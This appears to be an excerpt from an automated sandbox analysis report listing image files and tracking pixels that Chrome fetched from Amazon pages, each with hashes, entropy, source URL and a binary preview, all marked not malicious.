                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........W.."...............................................................1..!AQq.."Sa....2......#3BCDTr...R...cs..............................................1A!.............?..R.......d...Q.I...(......,H..E@..9..{9m&.+sp....\\q,":.. RK0n...o..do....J..d..F...E.#R.&...(.M.[.......K.{f..&.hJ.....~.x.^vn...h.L.....[.E..VE..S..9~J6_/..b...k.?....U..K\......{c.7....f...#.F.q.j.|....{).-[..U.....h.....t.6...3......'n.....y....j+.vr]...Y.dZ.u..g....P.....4@.vfF...2...Q...S.\...QM..L%[y.d..9$.'F=,....E*ie.WI.....;{.+.....3.{........*.Ej..el5=.pw.....^..#.....L.{...+..K}j.b...5...yp.../.*...g..:.OJ...m#...L..y.^o....Eds..;X..:H........_............. "...w.......h;.;s7?4.zId?.U.....I.6.....%z.:.{.]=t.."5...1w..BB..{.R..5+"...."Q..u.Q.._G...J.8.......!$gG...=.\...k..jWU&.....#..,..q...|....jq..@..,f0.`R..n.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 194 x 295, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):45977
                                                                                                                                                                                                                                                                Entropy (8bit):7.985058314720174
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Ox2kO+0B5izHhTPdZVliVcR3+/ku/iUYi09ERbCC4lxOQ3JZT9AlpsyjSB:OAkp45izBXfNR35u/izi2GbHU3X9An8B
                                                                                                                                                                                                                                                                MD5:A824C7A90E2C465DA4C4DB9FD9FC15E4
                                                                                                                                                                                                                                                                SHA1:36F46FBD4D03D1E55BC0B0D4381D351620750532
                                                                                                                                                                                                                                                                SHA-256:6641FF165206F0F54CD94518DED93DFCBFC7436A806B0DE96991CB3DA4032A8B
                                                                                                                                                                                                                                                                SHA-512:AF530AF8E111A8B7DA4C2776253E6BDFD295E2A84A11EBCC020024E6B8364C6D75AC2C8BAE725D6441036BB3F163E74410F87F9C9B031417F16DA330C5C708DC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/Z8YwjOjqIHxqujG.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......'.............gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8803
                                                                                                                                                                                                                                                                Entropy (8bit):7.922544542482178
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:jJqDW91wyB1NOgy9mXrAEHDfq2kwgcr24lf1joABf4YOeGky3XYpUc8uZ:kDW9fB1NQMXZjftkw3r24lfpoAKfg6uZ
                                                                                                                                                                                                                                                                MD5:5450C8BADB1EE08FF4F4591751FE3A5D
                                                                                                                                                                                                                                                                SHA1:7AA4E13E3854468EADCA584FAA60CC25A3DDB40B
                                                                                                                                                                                                                                                                SHA-256:07F34C3DF184743290BB57D71E9EFC80F03947BF4A58D81ED5F6396B0724E045
                                                                                                                                                                                                                                                                SHA-512:9D76F94520B38492003206D18E0F3620B49CF5AE691A0D8C886A1AE672A39004FFA46C75B462AFD25373B5E29561172D65F55574B67198E7B00EAF688D81CFEC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61v-DUo-vZL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."......................................................................"8...!4...!.s..4..G).;x.\.3;......99.Q.xe.......p(.fK..~L`&..^$.....$..s.7e.......Ca.G...!:....>.|..8r.. s..>_.-.N....)7.O.d.L....s....8P......=.....d/d.$w0...s.....B.]..+...;..'N(O..F.....eRY........I./...IL..q...2:rt...3F....B......."t.0..`.+.5..O..P.g..F.6)A3WT.;.'...w.7.n.....wE.F.G.>..6s@X...Y....<d7`Vc.B...(....e.%P...n........#.N.. ..8(.N..S.......x...H._.;9..U.R....(2Q...j..e...=.9._2....Y.P..`.+......v.p..nK.....#...KJ.!a.y...yY..U.Y...s.PI.......3.>z.p."......!F..H.s\'A,..=..]..jd....83..N \...%...........L2...4.b.%a...)...j.h.6......_`....y........x=.d..,6.!.r.../...... 2.+0>..F..i....2.i.....#..H.I......@4.....,I.c.,....?...(........................!1A.. 2Q".#3aR...................~..o..~.B.._.(..1.%..L.....2...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 179x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8228
                                                                                                                                                                                                                                                                Entropy (8bit):7.944789520821368
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:zITEmvztkjGzrpjWDor3cjsm34LhYBIR+ck2arXSjT:7GWDo7c9ohYyRPAT2
                                                                                                                                                                                                                                                                MD5:C231B92A44317366DAA8EC724F82193E
                                                                                                                                                                                                                                                                SHA1:FBF0E7EC0B3A61BC9689FFECA36E4DC739871CC5
                                                                                                                                                                                                                                                                SHA-256:145F9FB0B5A6E6CC48FFB860EC09927FF844C451C1D880466679AB4EBDAFCDB1
                                                                                                                                                                                                                                                                SHA-512:D48D0D9FB873B42A89150A48B04010E90E72687731628E34D71F08DA9B48D21EFDC0DF58357558D783EBCF0EB3B92F30BABA0FD277F2E5C1E3D0F342787694DA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!.1."A.Qaq..2..#BR....3Cbr...$4Ss.5d..................................................!1..."Aa.2Q...#..3.................?..R.B)JQ..)D"....R.B+E.&.i.Ed.'.....;a.:.7...2..3.....Z.......o."...........;n..2._{bEl,....v.U.{.d.....!...B..v.....@..u.G...Yb.B...,...1F..b..."}.7PQ..O<....&.p8....8=..._<.+I]........7p..........hh..u.R....X..... ..J.{9.2i.E.r...u......7..3.Q..4M.....*."....R.B)JQ..)D"....R.B)JQ..)D"........[.}..d.%q....S...W.^..|YXN....(YD.N._y......_m...J.......P.v. ...W...r.w6...:..r...m....?>.....k.Z[V2......?F.I..9V..~5P.=..X...5.......[..N)O...N....y{5....U8.......&>e..p.....g......x...05....N}..R...)JQ..)D"....R.B)JQ..)D"....R.B*...au<..b@d>.B"..K...MZL..bp...u{x.....n...B.O.OnMYt....y.q.-.{G.....VvFd>/"U..;....Q.n-ZX.....B.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3Asi%26si%3D283%26pc%3D3927%26at%3D3927%26t%3D1723469077945%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:3927
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4983
                                                                                                                                                                                                                                                                Entropy (8bit):7.917430014322651
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TCpEsyaqQDp3ZH3SmKH78vDKChIjZRkl85gpQvczu/6xDKcS8hsDazh8:4l3NlKHAvDKE6Rkl8WjRVKkWe8
                                                                                                                                                                                                                                                                MD5:A711F9545F461C8ECE6C86140F55F392
                                                                                                                                                                                                                                                                SHA1:EED1316F0878B530C8192ABE45024ABF9F3B1E19
                                                                                                                                                                                                                                                                SHA-256:43EBCC66E541A5A43F26C5B6C5AF483E5FA518AB711AA6927D53287E5C22F47A
                                                                                                                                                                                                                                                                SHA-512:9766CB804A7D866E351066DC5E110448724900276B719090B1E9E45EDDCAC3AE26704AD4E739AF5F5C02CFFE7DCA4A5A9A0F0AA7A55967C014D54DD56622E78F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/81RRRcFjLJL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1AQ.."q....2ab.3BRr...#Cs.4...%c................................................!1.A2."Qq.a3BR............?..-.B.B..........l.....t..qk..4.uA............S.|z78.:..V....U..!.{.s..TF...'..y...A._.S.b.*!...{..yX....5.+.u.vQ.D.x..buN....... ..~.)s`!..S .E.R..1].[i6.x...............Hd.....<.........'h?3....]..'m$...2...F....^.._C.*...O......6....7...R......(u]"....s..\....#..n.E.r.)U..)....J...d..p$p.p.....$.....!.!.@.B.....?..ee+9....sw0LWB..Y.I'..../..t.'.==7.Q2:.i7.>Ju.Hi3..2\.pp-..Ks...\.|o.U.l.F]...!..;;..z..C\.......Q...:.....7...i.9..0...W.ZO...#............b.W..A-.....q.j.;..w.........kj@..IG.hev*@.8..vo@.x.f.J.7.G..[..rQf.$..cj...#..W...<.Z..5..s.9..mu.+X.2\..I..[<B..<vF.U.H...CCN.....~.~6..Zh...u,$..UHK.Y)$.......S}*...=.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 208x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6735
                                                                                                                                                                                                                                                                Entropy (8bit):7.93613681514929
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WttcysV7A/Mhzbr9/U9Q4TUXWYRqC7FaNu6DuNm8jxq:WdsVE/Sz9ci4UXhRq9Nu6DAmqxq
                                                                                                                                                                                                                                                                MD5:7294BFDDF6930F011703952D9C20DEBE
                                                                                                                                                                                                                                                                SHA1:E6CE57A49AD0716AF6D3D815EE8F8FA3C5F88438
                                                                                                                                                                                                                                                                SHA-256:CB8B3AF5708F92E394A3155972BFD74B6EA3BB90246EF5894E350A34C3B984E0
                                                                                                                                                                                                                                                                SHA-512:7A0556BCF02D84412D86084106A7402D450ADB0F8F43DED707DC9D40112BD115863D87590DDB0F5B3A29381677A9C6AC8F465AC5D07A183C7B794D41CC668D39
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61WB26MsoHL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!1.Aq"2Qa..3Br...#....Rs...D....$CTbc................................................!1.."A.2Qq.a...#..............?..R..R..R..R..R..R...q...'../...emb.......'r.T..9.......I..0...^F_'n.|.;x...[.$.Ggy...1wvn...,...I4...I.wQv]4%.^..s...C.%T.^!....&.xs...*.......3...%.........Pl..&.Q.MR.%..../S...8.....;o.....aU...U..I..D...s..qA.....C`...'.. ...Ab....g.>..*=..:...../.<i'i.OKa.Y.....c..5..+o.:.Po+.........qg.ci/.....Z.8+....._..W...U...9.B..)...E..Qh.r.F..e?....QA.........Vm..\.g...."..C...m2:E.SsH=....2...E....../LH..c..G..&.Ox..t......(..(..(..(.Yx..3.....h.9.^8RE;]9...|.F..VmsG...e..g.....+...A.....}...lWDt....+.&.k{.:.....@.........".Y.....b{.Q.b|..jp..Z..i......zt"G........t......cu.D.F..\=.|......T.AD...*.k....f.}a..~.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 133x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7782
                                                                                                                                                                                                                                                                Entropy (8bit):7.951354630220078
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:krepeLJVR0jjUwW13DeO/P/w3bQamnfHLnBdx+ETU:5w3hwWVDB/PeQamfrBf4
                                                                                                                                                                                                                                                                MD5:27573DBB8E52785F2959CF0A4EB56897
                                                                                                                                                                                                                                                                SHA1:414F0919BA761B828B5120FB79B7B784B3EF17C4
                                                                                                                                                                                                                                                                SHA-256:F8670097F4624D01E20977596DA2C561457BC75770409AE855D0B1065D805016
                                                                                                                                                                                                                                                                SHA-512:483EDB2DAFF918A165D18EA2BE0305BCAE64A24274A1299123326B699D1EEE33D2725E44D13B6942700DFFD6C4091158854FE6DDED0A13744EF83BA13DB6AC44
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1.."AQ2q..a..#B..$3...%Sc.............................................!..1..2QR............?....C..k..m.k...>...m@..0...9..s..<U.qio...X{V.%.Y.%.,.dh.*.B.Tz ....$!..:a.=...;*.e*...K#S.L. Sd.d.h...w..sU..>.f.-..q.....F..L==.+.B.i.I.......-PD..'....K;..MPh..u.)].v}?...g.|..S....8*..L....tX..D.!.......s........F#.Y.......b'Zo.<.<.}.M.SD..Q....b#...[yH......q..Wt.c...?m&#.k8....*..%..~.V./]..i...e..w.t.AY...a.)........X$^....4..So:${......^......&..#T....?.M...Z.):.?P...Z.1mg+$.Z.<=.AQ...J.l....z*...0.?Yo`x.Wr.]-vs.gV$...h......7.y..M..8.....E:;.....a..]..Ht..\..tA.F....7.w../..6.e.i..Hw{..b#..na}.....9....g..H.{g.1t..4.;@ ].Y..{X....o=.....H..m%.L..f....[..Uuu..Xn.7R..n..p[m.....f..mKbmv.g.......R....n.9.t.7p.BYGW.G........a...A.....9
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 150x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8611
                                                                                                                                                                                                                                                                Entropy (8bit):7.948684752712593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:R7KSKwYOKum/nUTyVTSUXaTX39QJA4MDrlzOfcZ2RoI9gAxgwan2KI:FBps/nnXaTX39QJdGrlO0Z2RoI6Axgw7
                                                                                                                                                                                                                                                                MD5:0032E24E18F57A134D3EC47C647BF66B
                                                                                                                                                                                                                                                                SHA1:1A6DC5A23AE7238E2F7B64FDCD2E7474BBBC8E9E
                                                                                                                                                                                                                                                                SHA-256:5A911CF24A6473070001ED3CEBC69BBE30371344F7F86D4D793E46E2180B1E7E
                                                                                                                                                                                                                                                                SHA-512:0CD5C8B5B57E353AA55DA065FC5DD69FD8F789BEA9583F772B87564A9D6EA441C2C05FE0746962094B7B255EED9AE7D321CBD19532BD453F73CA9FFD84EA4CCB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61HvUP231DL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1."A.Qaq.#2R...5B.....bt$4Cc...Ss..%3r.....................................................!1.2."Qaq..4Ar.....#B..$3..............?.Hu..W.Ck..+Cn.G.U..xlp...r.Su.'I..^...\..6.. .<.<.0{.O..l~.n...o0Uc.P0WP.J.p.r...<.....\j.gI]..f...`'.b...Q@...'.iZ1..5.#.....1-E.S.9..%..V.v. ic....H.Tz...W/.6|.V...6.e*.>.....B..0waM/..../M .6.+..B.l....[,.T!f`0r.f.E....T...,-Y.N.^....K.2c.B..F7.~..........w.e..v".(X.;.).....L....&..vy........H...!h....(.(..!.e._.P...M-)..gK..~....0.`.G,...d8\..!...R.&.....w.>.........@.....t%...~s.n$-..=.)Q..e9.......].kI..[s.q..Q.Q.@...}...}.rr@.W.9.Y.3.B.......dd..xNPv$(&...].....&.l..I.o..:.7X...+JqQ..C......z.S....]..4..#*.f...~H'..Y}...O..R..Pq.'.#y..e....(.b...(.(..!.(..B.(....(.*.a.f......<.#..Vh..J.L%..B.W.(nV....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):66043
                                                                                                                                                                                                                                                                Entropy (8bit):7.92587183958159
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:gvohywJnc2V+JEXekAqophXVodZub6entbv2LkDUMGKdttS7:+VwJ3V+yXekhophXVodZubtxvvUMG0tU
                                                                                                                                                                                                                                                                MD5:F6C51378C8351ABB9C8902B47303D022
                                                                                                                                                                                                                                                                SHA1:DE358D6C3A83E82443E4B3C5B0AC9AA8BFAD22FB
                                                                                                                                                                                                                                                                SHA-256:66C0EB40C7FDB190B6E00AC99DE773A7F8461B4E8585E8522042A5B0644F8500
                                                                                                                                                                                                                                                                SHA-512:39790AB8AAFD0261C48FE0D360907BAED683046396ADCA2B0A9F5784D5DC1F14944820A31AFFF41C1DBF8D77FB2542C3A1E977F262747DAF7481E1C016073735
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*.................Ducky.......0......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a5ecbaa6-ca8a-48b3-9ab9-0568866a55c5" xmpMM:DocumentID="xmp.did:3C95DCF94C1511EF856A94285C069192" xmpMM:InstanceID="xmp.iid:3C95DCF84C1511EF856A94285C069192" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:436fb9fc-aa5c-4a95-a409-6aae293d594f" stRef:documentID="adobe:docid:photoshop:e65d89a6-917f-e949-b271-9d2c7c650dc3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6578
                                                                                                                                                                                                                                                                Entropy (8bit):7.938367682064232
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TPvMlb6L1UpJC6CYngB8UW65Hu+mmIhHfQbTE3A0qVKTr+V1QJTl1EfO84wd0pcc:RUDqYgB8KShANVK/+VKu0lS25ubEf
                                                                                                                                                                                                                                                                MD5:8D910385C6F97CC16D80987523C570D0
                                                                                                                                                                                                                                                                SHA1:41F57272183BE89DF8372D290AAD75D9BF3475B8
                                                                                                                                                                                                                                                                SHA-256:1CD13B3CF2E8FC70D1C9A05D836A783B59246001779E040F690E42D3C631F87E
                                                                                                                                                                                                                                                                SHA-512:AD9BA90A947409E3D5A49525CAB445AF4F2F3D4DD4C5ADC872B076B12F3E8C1E0F98AF655DECD746DF0BBD83A378C7A5E0CBE1CD7BEEDA52A4E1A5957CD5AA1C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!..1.A.."2Qqs.#Bar......345bt...%CRSc...$T...6................................................1...2AQq!.."#$34Ra..............?..(...(...(...(...(............C...#.6#.W....ei4..*\z.......4.@..g...m.heH..P.u,.v5..'.`.<c.qio.&.t.@.,...V...P...5D....!(...d..V.....p.+u.PZD......*.C.XH^'.V.i..|.g{..f$.m....-0'...).(.._73J..*...B#....9..........(...(....q.{r..9S.E-..K$.......E...p.Ae.*RxC.*.........G....&..\U>....QU....M ..^.9G........>..b.EV..m..^.|...ON...vk...S...}.=.Q...~.:....X0.t5.jF\...9....9%..QX....5B.Xe......(.{..RW.7d.o.EH.cP.B.7.[,X...H..U.W.x..Z../..i.).-,..-...|..A...F....g..g7.".i.....SD.t...J..........q...%.L.l..$...W.I0^..b.{.?......9..zxd..T...e..*0....F.....r.........y.S.....d.$D.....j+........t..K.l5....}4.a..(...(..4..N.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14622
                                                                                                                                                                                                                                                                Entropy (8bit):7.867458077991927
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Lj0bACI6nRAvBhrvBQlD6AE3WJ32D8arKXoKyDuadeLYM:cbLIXBh9kQWJ2QoKuuiesM
                                                                                                                                                                                                                                                                MD5:C60A77B8880BF976B06488D12FEA13E3
                                                                                                                                                                                                                                                                SHA1:07E14DFA0BF56E0BCE2EEDAC999878F8DFD3528B
                                                                                                                                                                                                                                                                SHA-256:A2CD8FA5065A7F5AD75077D385983389DFE212E31D8393EF28D1D7673A3E6CC9
                                                                                                                                                                                                                                                                SHA-512:9CE72741205EB6553031DEFCD42F1BCABC9977C2EAEA99BC41A7928BFBBBE1293B9F4DE526571FFCED40EE12C36EAD22B270DD4448FB8D43C1DCA4314438717E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259740_400x400_2X._CB617696541_.jpg
